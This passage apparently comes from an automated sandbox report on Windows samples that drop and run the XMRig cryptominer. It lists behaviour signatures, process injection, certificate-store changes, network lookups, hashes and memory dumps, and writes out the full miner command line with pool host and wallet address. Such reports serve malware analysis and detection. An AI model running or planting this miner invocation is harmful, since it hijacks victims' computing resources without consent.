e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4468 wrote to memory of 5116 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4468 wrote to memory of 5116 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/5116-16-0x000001C7AFDA0000-0x000001C7AFDC0000-memory.dmp
memory/5116-17-0x000001C7AFDF0000-0x000001C7AFE10000-memory.dmp
memory/5116-18-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-20-0x000001C7B16C0000-0x000001C7B16E0000-memory.dmp
memory/5116-19-0x000001C7B16E0000-0x000001C7B1700000-memory.dmp
memory/5116-21-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-22-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-25-0x000001C7B16C0000-0x000001C7B16E0000-memory.dmp
memory/5116-24-0x000001C7B16E0000-0x000001C7B1700000-memory.dmp
memory/5116-23-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-26-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-27-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-28-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-29-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-30-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-31-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-32-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-33-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-34-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-35-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-36-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-37-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-38-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-39-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-40-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-41-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-42-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-43-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-44-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-45-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-46-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-47-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-48-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-49-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-50-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-51-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-52-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-53-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-54-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-55-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-56-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-57-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-58-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-59-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-60-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-61-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-62-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-63-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-64-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-65-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-66-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-67-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-68-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-69-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-70-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-71-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-72-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-73-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-74-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-75-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-76-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-77-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-78-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-79-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-80-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-81-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-82-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-83-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
memory/5116-84-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5084 wrote to memory of 928 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5084 wrote to memory of 928 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4220,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=1284 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3568,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=4272 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/928-16-0x000001AEDBF30000-0x000001AEDBF50000-memory.dmp
memory/928-17-0x000001AEDC180000-0x000001AEDC1A0000-memory.dmp
memory/928-18-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-21-0x000001AEDD980000-0x000001AEDD9A0000-memory.dmp
memory/928-20-0x000001AEDC1A0000-0x000001AEDC1C0000-memory.dmp
memory/928-19-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-22-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-23-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-25-0x000001AEDD980000-0x000001AEDD9A0000-memory.dmp
memory/928-24-0x000001AEDC1A0000-0x000001AEDC1C0000-memory.dmp
memory/928-26-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-27-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-28-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-29-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-30-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-31-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-32-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-33-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-34-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-35-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-36-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-37-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-38-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-39-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-40-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-41-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-42-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-43-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-44-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-45-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-46-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-47-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-48-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-49-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-50-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-51-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-52-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-53-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-54-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-55-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-56-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-57-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-58-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-59-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-60-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-61-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-62-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-63-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-64-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-65-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-66-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-67-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-68-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-69-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-70-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-71-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-72-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-73-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-74-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-75-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-76-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-77-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-78-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-79-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-80-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-81-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-82-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-83-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
memory/928-84-0x00007FF7F20C0000-0x00007FF7F2BC3000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
